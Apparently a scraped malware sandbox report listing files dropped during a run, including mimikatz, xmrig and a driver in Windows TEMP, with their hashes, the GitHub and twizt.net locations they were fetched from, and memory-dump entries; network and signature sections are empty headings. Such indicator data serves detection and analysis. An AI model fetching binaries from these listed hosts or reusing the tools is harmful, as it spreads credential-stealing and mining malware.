d559fc0cd3ec7237123d1a3b26147c7a78f4e71900750828081518ec9cb42c55

SHA512
dcd2dc54f0df3f2cc946476807bfec915986733c6e737a588d5dd07562ec53879f4d5070041d44704e5c37345a4df6884c892530f839f2defa6bae961f06fdaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe

Filesize
48KB

MD5
746788dfe51900ef82589acdb5b5ea38

SHA1
c992050d27f7d44d11bf0af36ae0364555e8ef9b

SHA256
9d5e81d3d165035999f9c33f5f379acbc4c4e8cfafa2ecef9763f60e94984587

SHA512
d24556e175ab630834db1656372aaa9724d9f78686bc55e909155ce933e4c9ab22188d24842a41be7b84fc483c6781cb9c7017e1acfeea6bf8b558260b6bfe07

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe

Filesize
208KB

MD5
70ddf4f6215e0fd7b65685e3da758082

SHA1
8fb69a1e9d9049880787748c57e98bc9b76a5152

SHA256
9df0a6e74330d311721f5bf0e64734fd0bf8666f90863893cd4d869d053dcfcd

SHA512
a37d4f756c2ccf597f313f479559c8aef0510e02aea9625c73ead435defbf32bd2d71887e36ddb2bfe3caad5ab70febd6675040eb05430ea9c220ce0e7b29c62

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe

Filesize
875KB

MD5
331031dc04a856a1f9116494fae27339

SHA1
e363fef9a5bd634b581aabae6710ff18c46e359d

SHA256
1a4b61f07e83bf7dbb860996f3d9c0953d61afb4ed5d39acac7563fd091298dc

SHA512
e7ac6699d7637eb620d4427167564ff92b79b6c420f4fe9725f271d630d3adfee2d56358d90f91d417cbbd4523e3a147c0b8e86082aa562436fed50ccf5b87d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe

Filesize
971KB

MD5
46f366e3ee36c05ab5a7a319319f7c72

SHA1
040fbf1325d51358606b710bc3bd774c04bdb308

SHA256
2e8092205a2ded4b07e9d10d0ec02eba0ffcf1d370cab88c5221a749915f678a

SHA512
03e67c8f76a589ad43866396f46af12267e3c9ab2ca0a155f9df0406b4bd77b706e12757222d7c95bfa4b91d6ef073150edb87d11496617a2004e9dc953904e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe

Filesize
278KB

MD5
cc5e97a8a3e9b5dfc2093dde57137b23

SHA1
8c0d1dd75ae6fcf80d855b7494a8cab54eb05b29

SHA256
5975948b57707a6f3da15eecf5c53642caaea7ef315273ddf4a71c2530c5c3e4

SHA512
6f7da6d45e186d3037504f547fb7500a9fccf0e65940cad2f0972fbb0f01febd123a28f4808e615848db11e2e0813f3a006febef4e1233ba112087c4066765ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainncpa.cpl.exe

Filesize
211KB

MD5
dc503db57e725664e4c7f18998496294

SHA1
1ff194472c65c0e6bee6b6854cd2f8ff920a1e94

SHA256
629783e4b3adb802672bae160fc7e77c8150621ba2cb586ff491277af864e97e

SHA512
a827657fd087f4c3a556d385938cbd6f022c7f76a185bbd8d3dd9734f99c08f9e4a9dafb5f684443a30680fdc8bbe2849c1d5865a875060d75ee07231c6629b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe

Filesize
189KB

MD5
8d04bc23c265be8dc918b1ba7d299cc8

SHA1
5317e870120f3dcb71052f02ba3af46aa8f70979

SHA256
e9c8e31f8b93a78f224ba8a4bdb85e00d76b369033b9eb65b17637b915c9904e

SHA512
06392cac7933605a53cced3f11d27e225fa36fe9be1ca80530c86bdba0942b540785c04e8f64b27a8928357a650632de2453b4270d7737a17cf9d3dd4083e8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe

Filesize
9.1MB

MD5
cb166d49ce846727ed70134b589b0142

SHA1
8f5e1c7792e9580f2b10d7bef6dc7e63ea044688

SHA256
49da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb

SHA512
a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe

Filesize
37KB

MD5
aa83d654a4475f46e61c95fbd89ee18f

SHA1
423100a56f74e572502b1be8046f2e26abd9244e

SHA256
3c0c8341a5c799791524e3cff41e7a99cd5e2eabf93a122d551896186bc88ca8

SHA512
61ce64757af6da152ba505b1c9cfab0b8c3932b01e8ca999353cdd2e14c7469ee5fb480b6d978dd0d040339814ee67c67cf63043e8d24d3f6ec1e22e71294798

Download Submit
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2250935964-4080446702-2776729278-1000\0f5007522459c86e95ffcc62f32308f1_0f7d7b03-ec21-415f-b0c1-d20b1b857660

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Windows\TEMP\sfwejasffykf.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
memory/356-97-0x0000000005F70000-0x0000000006002000-memory.dmp

Filesize
584KB

Download
memory/356-101-0x0000000006010000-0x00000000060AC000-memory.dmp

Filesize
624KB

Download
memory/356-146-0x0000000007BB0000-0x0000000007BB6000-memory.dmp

Filesize
24KB

Download
memory/356-145-0x0000000007B80000-0x0000000007B9A000-memory.dmp

Filesize
104KB

Download
memory/356-144-0x00000000063C0000-0x00000000063E6000-memory.dmp

Filesize
152KB

Download
memory/356-96-0x0000000000F40000-0x00000000015DA000-memory.dmp

Filesize
6.6MB

Download
memory/356-115-0x0000000005F50000-0x0000000005F5A000-memory.dmp

Filesize
40KB

Download
memory/560-20-0x0000000074571000-0x0000000074572000-memory.dmp

Filesize
4KB

Download
memory/560-29-0x0000000074570000-0x0000000074B21000-memory.dmp

Filesize
5.7MB

Download
memory/560-38-0x0000000074570000-0x0000000074B21000-memory.dmp

Filesize
5.7MB

Download
memory/560-84-0x0000000074570000-0x0000000074B21000-memory.dmp

Filesize
5.7MB

Download
memory/1672-143-0x0000000000500000-0x0000000000506000-memory.dmp

Filesize
24KB

Download
memory/1760-507-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-501-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-493-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-483-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-478-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-492-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-481-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-2014-0x0000000005F80000-0x0000000006058000-memory.dmp

Filesize
864KB

Download
memory/1760-2037-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

Filesize
304KB

Download
memory/1760-1964-0x0000000005EA0000-0x0000000005F7C000-memory.dmp

Filesize
880KB

Download
memory/1760-479-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-485-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-487-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-496-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-499-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-490-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-503-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-509-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-511-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-506-0x0000000005A00000-0x0000000005B7C000-memory.dmp

Filesize
1.5MB

Download
memory/1760-472-0x0000000005A00000-0x0000000005B82000-memory.dmp

Filesize
1.5MB

Download
memory/1760-460-0x0000000000B60000-0x0000000000EE0000-memory.dmp

Filesize
3.5MB

Download
memory/2976-131-0x0000000000080000-0x0000000000086000-memory.dmp

Filesize
24KB

Download
memory/3024-60-0x00007FF8C4950000-0x00007FF8C5412000-memory.dmp

Filesize
10.8MB

Download
memory/3024-2311-0x00007FF8C4950000-0x00007FF8C5412000-memory.dmp

Filesize
10.8MB

Download
memory/3024-1-0x000001E1D9C40000-0x000001E1D9C4A000-memory.dmp

Filesize
40KB

Download
memory/3024-3-0x00007FF8C4950000-0x00007FF8C5412000-memory.dmp

Filesize
10.8MB

Download
memory/3024-2-0x00007FF8C4953000-0x00007FF8C4955000-memory.dmp

Filesize
8KB

Download
memory/3024-0-0x00007FF8C4953000-0x00007FF8C4955000-memory.dmp

Filesize
8KB

Download
memory/3144-152-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3144-157-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3144-154-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3144-153-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3144-151-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3144-150-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3744-47-0x0000000000330000-0x0000000000358000-memory.dmp

Filesize
160KB

Download
memory/3744-48-0x00000000052B0000-0x0000000005856000-memory.dmp

Filesize
5.6MB

Download
memory/3864-120-0x0000000000450000-0x0000000000456000-memory.dmp

Filesize
24KB

Download
memory/4824-295-0x000001D7E42D0000-0x000001D7E42D6000-memory.dmp

Filesize
24KB

Download
memory/4824-294-0x000001D7E2750000-0x000001D7E2756000-memory.dmp

Filesize
24KB

Download
memory/5048-209-0x0000000005890000-0x0000000005EBA000-memory.dmp

Filesize
6.2MB

Download
memory/5048-240-0x00000000061C0000-0x0000000006517000-memory.dmp

Filesize
3.3MB

Download
memory/5048-309-0x0000000007680000-0x000000000769E000-memory.dmp

Filesize
120KB

Download
memory/5048-299-0x000000006E5F0000-0x000000006E63C000-memory.dmp

Filesize
304KB

Download
memory/5048-298-0x0000000007640000-0x0000000007674000-memory.dmp

Filesize
208KB

Download
memory/5048-339-0x0000000007A90000-0x0000000007A9A000-memory.dmp

Filesize
40KB

Download
memory/5048-341-0x0000000007B40000-0x0000000007BD6000-memory.dmp

Filesize
600KB

Download
memory/5048-318-0x00000000076A0000-0x0000000007744000-memory.dmp

Filesize
656KB

Download
memory/5048-361-0x0000000007B00000-0x0000000007B11000-memory.dmp

Filesize
68KB

Download
memory/5048-329-0x0000000008050000-0x00000000086CA000-memory.dmp

Filesize
6.5MB

Download
memory/5048-2033-0x0000000007C20000-0x0000000007C28000-memory.dmp

Filesize
32KB

Download
memory/5048-392-0x0000000007B30000-0x0000000007B3E000-memory.dmp

Filesize
56KB

Download
memory/5048-333-0x0000000007A10000-0x0000000007A2A000-memory.dmp

Filesize
104KB

Download
memory/5048-271-0x0000000006620000-0x000000000666C000-memory.dmp

Filesize
304KB

Download
memory/5048-454-0x0000000007BE0000-0x0000000007BF5000-memory.dmp

Filesize
84KB

Download
memory/5048-208-0x00000000030F0000-0x0000000003126000-memory.dmp

Filesize
216KB

Download
memory/5048-263-0x0000000006570000-0x000000000658E000-memory.dmp

Filesize
120KB

Download
memory/5048-471-0x0000000007C30000-0x0000000007C4A000-memory.dmp

Filesize
104KB

Download
memory/5048-225-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/5048-218-0x0000000005F10000-0x0000000005F32000-memory.dmp

Filesize
136KB

Download
memory/5048-219-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/5140-313-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5140-314-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5140-321-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5140-311-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5140-315-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5140-312-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/5148-475-0x00000000008E0000-0x00000000008EA000-memory.dmp

Filesize
40KB

Download
memory/5196-323-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-320-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-325-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-319-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-326-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-327-0x000001BAF6BB0000-0x000001BAF6BD0000-memory.dmp

Filesize
128KB

Download
memory/5196-324-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-363-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-328-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-331-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-330-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-322-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-334-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5196-332-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/5744-352-0x0000020E86210000-0x0000020E86514000-memory.dmp

Filesize
3.0MB

Download
memory/6052-393-0x0000000005A20000-0x0000000005B2A000-memory.dmp

Filesize
1.0MB

Download
memory/6052-380-0x00000000031C0000-0x00000000031D2000-memory.dmp

Filesize
72KB

Download
memory/6052-381-0x00000000057A0000-0x00000000057DC000-memory.dmp

Filesize
240KB

Download
memory/6052-376-0x0000000005DC0000-0x00000000063D8000-memory.dmp

Filesize
6.1MB

Download
memory/6052-375-0x0000000000DD0000-0x0000000000DEE000-memory.dmp

Filesize
120KB

Download
memory/6060-1990-0x0000000000D60000-0x0000000000FFE000-memory.dmp

Filesize
2.6MB

Download
memory/6352-2275-0x00000000007F0000-0x0000000000B2C000-memory.dmp

Filesize
3.2MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request